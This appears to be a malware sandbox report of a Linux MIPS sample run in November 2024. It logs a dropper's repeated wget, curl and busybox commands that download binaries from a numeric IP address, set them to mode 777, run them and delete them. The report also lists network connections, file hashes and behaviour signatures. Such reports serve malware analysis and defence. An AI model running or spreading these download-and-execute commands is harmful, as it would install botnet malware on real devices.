[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/837-1-0xb66fb000-0xb670c044-memory.dmp
memory/861-2-0xb670d000-0xb671e044-memory.dmp
memory/914-3-0xb66da000-0xb66eb044-memory.dmp
memory/920-4-0xb66dc000-0xb66ed044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
